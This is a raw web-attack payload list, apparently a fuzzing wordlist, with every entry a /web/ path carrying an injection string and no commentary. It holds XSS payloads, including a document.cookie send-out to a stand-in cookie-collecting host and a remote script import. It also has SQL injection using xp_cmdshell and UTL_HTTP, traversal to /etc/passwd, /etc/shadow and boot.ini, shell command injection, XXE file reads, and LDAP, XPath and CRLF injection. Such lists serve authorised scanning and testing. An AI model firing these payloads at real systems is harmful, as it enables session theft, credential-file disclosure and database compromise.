/web/!@,/web/\\\\?\\/,/web/&LT/,/web/(')/,/web/&,/web/..%5c/,/web/..%%35%63/
/web/%2500/,/web/%5C//,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\u003C/,/web/&ltscript&gtalert(document.cookie);</script>/,/web/,/web/<IMG%20SRC="jav&,/web/<IMG%20SRC=&,/web/'%20--/,/web/admin'--/,/web/<>"'%;)(&+/
/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&ltscript&gtalert(document.cookie);&ltscript&gtalert/,/web/<script>alert("XSS")</script>/,/web/\u003c/,/web/<IMG%20SRC=javascript:alert(&quot;XSS&quot;)>/,/web/<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>/,/web/=%20;/,/web/=%20--/,/web/"%20or%201=1--/,/web/"%20or%20"x"="x/,/web/insert/,/web/hi')%20or%20('a'='a/,/web/';%20exec%20master..xp_cmdshell/,/web/'%20(select%20top%201/,/web/*|/,/web/x'%20or%201=1%20or%20'x'='y/,/web/'%20or%20''='/,/web/<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>/,/web/<![CDATA[<script>var%20n=0;while(true){n++;}</script>]]>/
/web/&lt;!--,/web/\\/,/web/<</,/web/[']/,/web/&,/web//%2A/,/web/%00/,/web/%2A/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC="javascript:alert('XSS')"/,/web/'><script>alert(document.cookie);</script>/,/web/@&apos;/,/web/<IMG%20SRC="jav&,/web/%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E/,/web/"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>/,/web/,/web/\x27\x6F\x72%20SELECT%20*/,/web/'%20or%20a=a--/,/web/'%20or%200=0%20,/web/order%20by/,/web/'hi'%20or%20'x'='x';/,/web/'%20or%20user%20like%20'%/
/web/'%20or%20'x'='x/,/web/or%200=0%20,/web/hi'%20or%20'a'='a/,/web/@variable/,/web/desc/,/web/handler/,/web/tz_offset/,/web/(sqlattempt2)/,/web/count(/child::node())/,/web/%26/,/web/<xml%20SRC="xsstest.xml"%20ID=I></xml><SPAN%20DATASRC=
/web/'%20or%20uname%20like%20'%/
/web/'%20or%20username%20like%20'%/
/web/'%20UNION%20SELECT/,/web/truncate/,/web/to_timestamp_tz/,/web/'sqlattempt1/,/web/@*/,/web/%28/,/web/<xml%20ID=I><X><C><![CDATA[<IMG%20SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/
/web/-1.0/,/web/2147483647/,/web/%00/,/web/\0/,/web/\nnetstat%20-a%\n/
/web/-1/,/web/null/,/web/\0\0\0/,/web/|dir/,/web/?x="/,/web//../../../../../../../../../../etc/passwd/
/web/-2/,/web/0/,/web/+%00/,/web/\0\0/,/web/`dir`/,/web/id%00/,/web/;dir/,/web/ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|/
/web/-20/,/web/-268435455/,/web/\00\00/,/web/\"blah/,/web/\n/bin/ls%20-al\n/,/web/../../../../../../../../../../../../etc/hosts%00/,/web/../../../../../../../../../../../../etc/shadow%00/,/web//../../../../../../../../../../etc/passwd^^/
/web/..%c0%af/,/web/%60/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/<script>alert(document.cookie)</script>/,/web/something%00html/,/web/<IMG%20SRC=JaVaScRiPt:alert('XSS')>/,/web/<IMG%20SRC="%20&,/web/';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}/,/web/'/,/web/\x3D%20\x27/,/web/or%201=1%20--/,/web/0%20or%201=1/,/web/"%20or%20"a"="a/,/web/as/,/web/hi"%20or%201=1%20--/,/web/exec%20sp/,/web/distinct/,/web/char%4039%41%2b%40SELECT/,/web/)/,/web///,/web/%2A%28%7C%28mail%3D%2A%29%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/shadow">]><foo>&xxe;</foo>/
/web/..%u2216/
/web/../../../../../../../../../../../../boot.ini/
/web/../../../../../../../../../../../../etc/passwd%00/,/web/../../../../../../../../../../../../etc/hosts/
/web/../../../../../../../../../../../../etc/passwd/
/web/../../../../../../../../../../../../etc/shadow/
/web/../../../../../../../../../../../../localstart.asp%00/,/web/../../../../../../../../../../../../boot.ini%00/,/web/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini/,/web/;/,/web/`/,/web/\'/,/web/,/web/{'}/,/web/%2e%2e%2f/,/web/..%%35c/
/web/../../boot.ini/
/web/..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web/../../../../../../../../conf/server.xml/
/web/..\/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<xss><script>alert('XSS')</script></vulnerable>/,/web/">xxx<P>yyy/,/web/&apos;/,/web/<IMG%20"""><SCRIPT>alert("XSS")</SCRIPT>">/,/web//,/web/'%20;/,/web/=%20'/,/web/or%201=1--/,/web/')%20or%20('x'='x/,/web/procedure/,/web/replace/,/web/'%20or%20uid%20like%20'%/
/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd/
/web//,%ENV,//
/web//../../../../../../../../%2A/
/web//../../../../../../../../../../../boot.ini%00/,/web//../../../../../../../../../../../boot.ini%00.jpg/,/web//../../../../../../../../../../../boot.ini%00.html/,/web//.../.../.../.../...//,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini/
/web//../../../../../../../../../../../etc/passwd%00.html/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini%00/,/web/\..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/*/,/web/|/,/web/@'/,/web/%00/,/web/%00//,/web//%00//,/web/,/web/%01%02%03%04%0a%0d%0aADSF/,/web/*'/,/web/%20|/,/web/..%25%35%63/,/web/&,/web/&,/web/&,/web/&,/web/\x3c/,/web/\x3C/,/web/%3cscript%3ealert(document.cookie);%3c%2fscript%3e/,/web/%3cscript%3ealert("XSS");%3c/script%3e/,/web/*&apos;/,/web/<IMG%20SRC=`javascript:alert("'XSS'")`>/,/web/<IMG%20LOWSRC="javascript:alert('XSS')">/,/web/-/,/web/\x3D%20\x3B'/,/web/'%20or%200=0%20--/,/web/'%20or%201=1--/,/web/limit/,/web/hi")%20or%20("a"="a/,/web/\x27UNION%20SELECT/,/web/like/,/web/&lt;&gt;&quot;'%;)(&amp;+/
/web//../../../../../../../../../../etc/shadow^^/
/web//./././././././././././etc/passwd/,/web//../../../../../../../../../../../etc/passwd%00.jpg/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd/,/web/../../../../../../../../../../../../localstart.asp/
/web//./././././././././././etc/shadow/,/web/\\&apos;/bin/cat%20/etc/passwd\\&apos;/,/web//./././././././././././boot.ini/,/web///,/web/&lt;/,/web/*|/,/web/<?/,/web/!'/,/web/..%bg%qf/
/web//etc/shadow/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web/C:/boot.ini/,/web/..\..\..\..\..\..\..\..\..\..\boot.ini/,/web/,/web/\\\\*/,/web/-/,/web/%3C/,/web/\t/,/web/..%255c/,/web/%7C/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/<<script>alert("XSS");//<</script>/,/web/^&apos;/,/web/<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>/,/web/<IMG%20DYNSRC="javascript:alert('XSS')">/,/web/'';!--"<XSS>=&{()}/,/web/\x27\x4F\x52%20SELECT%20*/,/web/"%20or%201=1%20or%20""="/,/web/"%20or%200=0%20,/web/asc/,/web/,@variable/,/web/update/,/web/';%20exec%20xp_regread/,/web/delete/,/web/%20$(sleep%2050)/,/web/*(|(mail=*))/,/web/%21/,/web/<name>',''));%20phpinfo();%20exit;/*</name>/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>/
/web/1.0/,/web/<%20%20script%20>%20<%20/%20script>/,/web/\00/,/web/;read;/,/web/id%00|/,/web/|id|/,/web//etc/passwd/,/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web/%00../../../../../../etc/passwd/,/web/%00../../../../../../etc/shadow/,/web/%00/etc/shadow%00/,/web/%00/etc/passwd%00/,/web/%0a/bin/cat%20/etc/shadow/,/web/\\&apos;/bin/cat%20/etc/shadow\\&apos;/,/web//..\../..\../..\../..\../..\../..\../boot.ini/,/web/}/,/web/&LT;/,/web//'/,/web/,/web/"\t"/,/web/%250a/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/\&apos;/,/web/%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E/,/web/[&apos;]/,/web/<IMG%20SRC="javascript:alert('XSS');">/,/web/<IMG%20SRC=&,/web/--';/,/web/'or%20select%20*/,/web/'%20or%20'1'='1'--/,/web/"'%20or%201%20--'"/,/web/select/,/web/PRINT%20@@variable/,/web/hi"%20or%20"a"="a/,/web/t'exec%20master..xp_cmdshell%20'nslookup%20www.google.com'--/,/web/'%20UNION%20ALL%20SELECT/,/web/'||UTL_HTTP.REQUEST/,/web/&apos;%20OR/,/web////,/web/(/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file://c:/boot.ini">]><foo>&xxe;</foo>/
/web/1/,/web/0xfffffff/,/web/$null/,/web/;ls%20-la/,/web/|/bin/ls%20-al/,/web//../../../../../../../../../../etc/shadow/
/web/1;SELECT%20*/,/web/%7C/,/web/*/*/,/web/&/,/web/<xml%20ID="xss"><I><B>&lt;IMG%20SRC="javas<!--%20-->cript:alert('XSS')"&gt;</B></I></xml><SPAN%20DATASRC=",/web/<HTML%20xmlns:xss><?import%20namespace="xss"%20implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>/
/web/2/,/web/268435455/,/web/%0a/,/web/;id;/,/web/|id/,/web/?x=/,/web/%0a/bin/cat%20/etc/passwd/,/web//%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini/,/web//..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow/,/web/%0d%0aX-Injection-Header:%20AttackValue/,/web/\/,/web/||/,/web/^'/,/web/&,/web/,/web/..//,/web/..%u2215/
/web/65536/,/web/\0/,/web/\00\00\00/,/web/|ls%20-la/,/web/?x=|/,/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd/,/web//.\\./.\\./.\\./.\\./.\\./.\\./boot.ini/,/web/%01%02%03%04%0a%0d%0aADSF/,/web/&lt/,/web/</,/web/!@,/web/&,/web/%5C/,/web/%2C/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/"><script>"/,/web/\";alert('XSS');///,/web/{&apos;}/,/web/<IMG%20SRC='javascript:alert(document.cookie)'>/,/web/'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E/,/web/--/,/web/\x23/,/web/or%201=1/,/web/"%20or%200=0%20--/,/web/")%20or%20("a"="a/,/web/PRINT/,/web/')%20or%20('a'='a/,/web/'%20or%20userid%20like%20'%/
/web/;netstat%20-a;/,/web/?x=>/,/web/\..\..\..\..\..\..\..\..\..\..\etc\shadow/,/web//..\../..\../..\../..\../..\../..\../etc/passwd/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00/,/web//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow/
/web/A/,/web/00/,/web/NULL/,/web/$NULL/,/web/&quot;;id&quot;/,/web/|dir|/,/web//boot.ini/,/web//..\../..\../..\../..\../..\../..\../etc/shadow/,/web//../../../../../../../../bin/id|/
/web/bfilename/,/web/'%20or%201=1/,/web/|/,/web/x'%20or%20name()='username'%20or%20'x'='y/,/web/'%20or%201=1%20or%20''='/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////etc/passwd">]><foo>&xxe;</foo>/
/web/C:/inetpub/wwwroot/global.asa/,/web/&lt;!--,/web/\\//,/web/<<</,/web/--/,/web/,/web/%3C%3F/,/web/%20/,/web/&,/web/&,/web/&,/web/&,/web/&,/web/&,/web/<IMG%20SRC=javascript:alert('XSS')>/,/web/'><script>alert(document.cookie)</script>/,/web//&apos;/,/web/<IMG%20SRC="jav&,/web/<IMG%20SRC=&,/web/"/,/web/\x27/,/web/'%20or%201=1%20or%20''='/,/web/or%200=0%20--/,/web/'%20or%20''='/,/web/or/,/web/hi'%20or%201=1%20--/,/web/--sp_password/,/web/having/,/web/'%20or%20(EXISTS)/,/web/%20'sleep%2050'/,/web///*/,/web/%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><!DOCTYPE%20foo%20[<!ELEMENT%20foo%20ANY><!ENTITY%20xxe%20SYSTEM%20"file:////dev/random">]><foo>&xxe;</foo>/
/web/C:\inetpub\wwwroot\global.asa/,/web/C:\boot.ini/,/web/%/
/web/exec%20xp/,/web/%27%20or%201=1/,/web/%2A%7C/,/web/*(|(objectclass=*))/,/web/!/,/web/%2A%28%7C%28objectclass%3D%2A%29%29/,/web/<?xml%20version="1.0"%20encoding="ISO-8859-1"?><foo><![CDATA['%20or%201=1%20or%20''=']]></foo>/
/web/FALSE/,/web/TRUE/,/web/\00/,/web/`id`/,/web/|ls/,/web//index.html|id|/,/web/..\..\..\..\..\..\..\..\..\..\etc\passwd/,/web/..\..\..\..\..\..\..\..\..\..\etc\shadow%00/,/web/\..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web/..\..\..\..\..\..\..\..\..\..\etc\passwd%00/,/web/.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow/,/web/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%255cboot.ini/,/web//../../../../../../../../../../../boot.ini/
